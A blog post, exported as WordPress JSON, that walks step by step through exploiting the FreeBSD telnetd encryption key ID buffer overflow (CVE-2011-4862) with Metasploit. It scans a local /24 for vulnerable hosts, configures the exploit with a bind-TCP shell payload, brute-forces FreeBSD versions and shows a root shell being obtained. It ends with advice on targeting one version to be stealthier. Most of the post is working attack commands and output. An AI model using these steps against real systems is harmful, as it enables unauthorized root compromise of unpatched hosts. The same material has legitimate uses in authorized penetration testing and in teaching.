{"id":335,"date":"2012-01-18T17:05:11","date_gmt":"2012-01-18T16:05:11","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=335"},"modified":"2012-02-03T09:33:09","modified_gmt":"2012-02-03T08:33:09","slug":"freebsd-derived-telnetd-service-exploit","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/01\/18\/freebsd-derived-telnetd-service-exploit\/","title":{"rendered":"FreeBSD Derived telnetd service Exploit"},"content":{"rendered":"

Mentioned by hdm here<\/a> and here<\/a> but I wanted to make a note of this myself.
\nFirst thing to do is setup the scan to look for vulnerable telnetd services:<\/p>\n

1
2
3
4
5
<\/div><\/td>
msf ><\/span> use auxiliary\/<\/span>scanner\/<\/span>telnet\/<\/span>telnet_encrypt_overflow
\nmsf  auxiliary(<\/span>telnet_encrypt_overflow)<\/span> ><\/span> set<\/span> RHOSTS 192.168.0.0\/<\/span>24<\/span>
\nRHOSTS =><\/span> 192.168.0.0\/<\/span>24<\/span>
\nmsf  auxiliary(<\/span>telnet_encrypt_overflow)<\/span> ><\/span> set<\/span> THREADS 64<\/span>
\nTHREADS =><\/span> 64<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And now to run the scan<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<\/div><\/td>
msf  auxiliary(<\/span>telnet_encrypt_overflow)<\/span> ><\/span> run
\n[<\/span>*<\/span>]<\/span> 192.168.0.1:23<\/span> Does not support encryption: Netgear Embedded Telnet Server (<\/span>c)<\/span> 2000<\/span>-2007<\/span>\\x0a\\x0aWARNING:  Access allowed by authorized users<\/span> only.\\x0a\\x0alogin: \\x0aERROR - Your telnet client rejected our request to use char-at-a-time mode!<\/span>\\x0aUnable to operate under this condition.\\r\\x0a\\x0a\\x0a\\x0aYour telnet session has expired due to inactivity...
\n[<\/span>+]<\/span> 192.168.0.13:23<\/span> VULNERABLE: FreeBSD\/<\/span>i386 (<\/span>)<\/span> (<\/span>ttyp0)<\/span>\\x0d\\x0a\\x0d\\x0alogin:
\n[<\/span>*<\/span>]<\/span> Scanned 026 of 256<\/span> hosts (<\/span>010%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 053 of 256<\/span> hosts (<\/span>020%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 087 of 256<\/span> hosts (<\/span>033%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 105<\/span> of 256<\/span> hosts (<\/span>041%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 132<\/span> of 256<\/span> hosts (<\/span>051%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 196<\/span> of 256<\/span> hosts (<\/span>076%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 213<\/span> of 256<\/span> hosts (<\/span>083%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 224<\/span> of 256<\/span> hosts (<\/span>087%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 235<\/span> of 256<\/span> hosts (<\/span>091%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Scanned 256<\/span> of 256<\/span> hosts (<\/span>100<\/span>%<\/span> complete<\/span>)<\/span>
\n[<\/span>*<\/span>]<\/span> Auxiliary module execution completed
\nmsf  auxiliary(<\/span>telnet_encrypt_overflow)<\/span> ><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Looks like 192.168.0.13 is vulnerable, what a surprise.
\nThe exploit we need to use here is exploit\/freebsd\/telnet\/telnet_encrypt_keyid:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> info
\n
\n       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
\n     Module: exploit\/<\/span>freebsd\/<\/span>telnet\/<\/span>telnet_encrypt_keyid
\n    Version: 0<\/span>
\n   Platform: BSD
\n Privileged: Yes
\n    License: Metasploit Framework License (<\/span>BSD)<\/span>
\n       Rank: Great
\n
\nProvided by:
\n  Jaime Penalba Estebanez <<\/span>jpenalbae@<\/span>gmail.com><\/span>
\n  Brandon Perry <<\/span>bperry.volatile@<\/span>gmail.com><\/span>
\n  Dan Rosenberg
\n  hdm <<\/span>hdm@<\/span>metasploit.com><\/span>
\n
\nAvailable targets:
\n  Id  Name
\n  --<\/span>  ----<\/span>
\n  0<\/span>   Automatic
\n  1<\/span>   FreeBSD 8.2<\/span>
\n  2<\/span>   FreeBSD 8.1<\/span>
\n  3<\/span>   FreeBSD 8.0<\/span>
\n  4<\/span>   FreeBSD 7.3<\/span>\/<\/span>7.4<\/span>
\n  5<\/span>   FreeBSD 7.0<\/span>\/<\/span>7.1<\/span>\/<\/span>7.2<\/span>
\n  6<\/span>   FreeBSD 6.3<\/span>\/<\/span>6.4<\/span>
\n  7<\/span>   FreeBSD 6.0<\/span>\/<\/span>6.1<\/span>\/<\/span>6.2<\/span>
\n  8<\/span>   FreeBSD 5.5<\/span>
\n  9<\/span>   FreeBSD 5.3<\/span>
\n
\nBasic options:
\n  Name      Current Setting  Required  Description
\n  ----<\/span>      ---------------<\/span>  --------<\/span>  -----------<\/span>
\n  PASSWORD                   no        The password for<\/span> the specified username
\n  RHOST                      yes<\/span>       The target address
\n  RPORT     23<\/span>               yes<\/span>       The target port
\n  USERNAME                   no        The username to authenticate as<\/span>
\n
\nPayload information:
\n  Space: 128<\/span>
\n  Avoid: 1<\/span> characters
\n
\nDescription:
\n  This module exploits a buffer overflow in<\/span> the encryption option
\n  handler of the FreeBSD telnet service.
\n
\nReferences:
\n  http:\/\/<\/span>cve.mitre.org\/<\/span>cgi-bin\/<\/span>cvename.cgi?name<\/span>=2011<\/span>-4862<\/span>
\n  http:\/\/<\/span>www.osvdb.org\/<\/span>78020<\/span>
\n  http:\/\/<\/span>www.securityfocus.com\/<\/span>bid\/<\/span>51182<\/span>
\n  http:\/\/<\/span>www.exploit-db.com\/<\/span>exploits\/<\/span>18280<\/span>\/<\/span>
\n
\nmsf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

The payload is limited to 128 characters so we only have a few options, shell is more than enough though!<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> show payloads
\n
\nCompatible Payloads
\n===================
\n
\n   Name                        Disclosure Date  Rank    Description
\n   ----<\/span>                        ---------------<\/span>  ----<\/span>    -----------<\/span>
\n   bsd\/<\/span>x86\/<\/span>exec<\/span>                                 normal  BSD Execute Command
\n   bsd\/<\/span>x86\/<\/span>metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP
\n   bsd\/<\/span>x86\/<\/span>metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline
\n   bsd\/<\/span>x86\/<\/span>shell\/<\/span>bind_tcp                       normal  BSD Command Shell, Bind TCP Stager
\n   bsd\/<\/span>x86\/<\/span>shell\/<\/span>reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager
\n   bsd\/<\/span>x86\/<\/span>shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline
\n   bsd\/<\/span>x86\/<\/span>shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline
\n   generic\/<\/span>custom                               normal  Custom Payload
\n   generic\/<\/span>debug_trap                           normal  Generic x86 Debug Trap
\n   generic\/<\/span>shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
\n   generic\/<\/span>shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
\n   generic\/<\/span>tight_loop                           normal  Generic x86 Tight Loop<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

We’ll select bsd\/x86\/shell\/bind_tcp to make things quick.<\/p>\n

1
2
3
4
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> set<\/span> payload bsd\/<\/span>x86\/<\/span>shell\/<\/span>bind_tcp
\npayload =><\/span> bsd\/<\/span>x86\/<\/span>shell\/<\/span>bind_tcp
\nmsf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> set<\/span> rhost 192.168.0.13
\nrhost =><\/span> 192.168.0.13<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And now to exploit, note that it trys against all versions of FreeBSD from 5.5 to 8.2<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> exploit -j<\/span>
\n[<\/span>*<\/span>]<\/span> Exploit running as<\/span> background job.
\n
\n[<\/span>*<\/span>]<\/span> Brute forcing with 9<\/span> possible targets
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 8.2<\/span>...
\n[<\/span>*<\/span>]<\/span> Started bind<\/span> handler
\nmsf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> [<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 8.1<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 8.0<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 7.3<\/span>\/<\/span>7.4<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 7.0<\/span>\/<\/span>7.1<\/span>\/<\/span>7.2<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 6.3<\/span>\/<\/span>6.4<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 6.0<\/span>\/<\/span>6.1<\/span>\/<\/span>6.2<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Trying target FreeBSD 5.5<\/span>...
\n[<\/span>*<\/span>]<\/span> Sending stage (<\/span>46<\/span> bytes)<\/span> to 192.168.0.13
\n[<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Command shell session 1<\/span> opened (<\/span>192.168.0.8:41452<\/span> -><\/span> 192.168.0.13:4444<\/span>)<\/span> at 2012<\/span>-01-18<\/span> 11<\/span>:01:05 -0500<\/span>
\n[<\/span>*<\/span>]<\/span> Sending second payload...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Looks like we got shell<\/p>\n

1
2
3
4
5
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> sessions -i<\/span> 1<\/span>
\n[<\/span>*<\/span>]<\/span> Starting interaction with 1<\/span>...
\n
\nwhoami<\/span>
\nroot<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

To be more stealthy you could set the exploit code to the specific version of FreeBSD you’re targeting:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
<\/div><\/td>
Available targets:
\n  Id  Name
\n  --<\/span>  ----<\/span>
\n  0<\/span>   Automatic
\n  1<\/span>   FreeBSD 8.2<\/span>
\n  2<\/span>   FreeBSD 8.1<\/span>
\n  3<\/span>   FreeBSD 8.0<\/span>
\n  4<\/span>   FreeBSD 7.3<\/span>\/<\/span>7.4<\/span>
\n  5<\/span>   FreeBSD 7.0<\/span>\/<\/span>7.1<\/span>\/<\/span>7.2<\/span>
\n  6<\/span>   FreeBSD 6.3<\/span>\/<\/span>6.4<\/span>
\n  7<\/span>   FreeBSD 6.0<\/span>\/<\/span>6.1<\/span>\/<\/span>6.2<\/span>
\n  8<\/span>   FreeBSD 5.5<\/span>
\n  9<\/span>   FreeBSD 5.3<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<\/div><\/td>
msf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> set<\/span> target 7<\/span>
\ntarget =><\/span> 7<\/span>
\nmsf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> exploit -j<\/span>
\n[<\/span>*<\/span>]<\/span> Exploit running as<\/span> background job.
\n
\n[<\/span>*<\/span>]<\/span> Started bind<\/span> handler
\nmsf  exploit(<\/span>telnet_encrypt_keyid)<\/span> ><\/span> [<\/span>*<\/span>]<\/span> Sending first payload
\n[<\/span>*<\/span>]<\/span> Sending second payload...
\n[<\/span>*<\/span>]<\/span> Sending stage (<\/span>46<\/span> bytes)<\/span> to 192.168.0.13
\n[<\/span>*<\/span>]<\/span> Command shell session 2<\/span> opened (<\/span>192.168.0.8:48865<\/span> -><\/span> 192.168.0.13:4444<\/span>)<\/span> at 2012<\/span>-01-18<\/span> 11<\/span>:03:55<\/span> -0500<\/span>
\nsessions -l<\/span>
\n
\nActive sessions
\n===============
\n
\n  Id  Type       Information  Connection
\n  --<\/span>  ----<\/span>       -----------<\/span>  ----------<\/span>
\n  2<\/span>   shell bsd               192.168.0.8:48865<\/span> -><\/span> 192.168.0.13:4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"

Mentioned by hdm here and here but I wanted to make a note of this myself. First thing to do is setup the scan to look for vulnerable telnetd services: 12345msf > use auxiliary\/scanner\/telnet\/telnet_encrypt_overflow msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0\/24 RHOSTS => 192.168.0.0\/24 msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64 THREADS => 64 And now to […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[64,4],"tags":[137,136,456,138,135],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=335"}],"version-history":[{"count":5,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335\/revisions"}],"predecessor-version":[{"id":350,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335\/revisions\/350"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}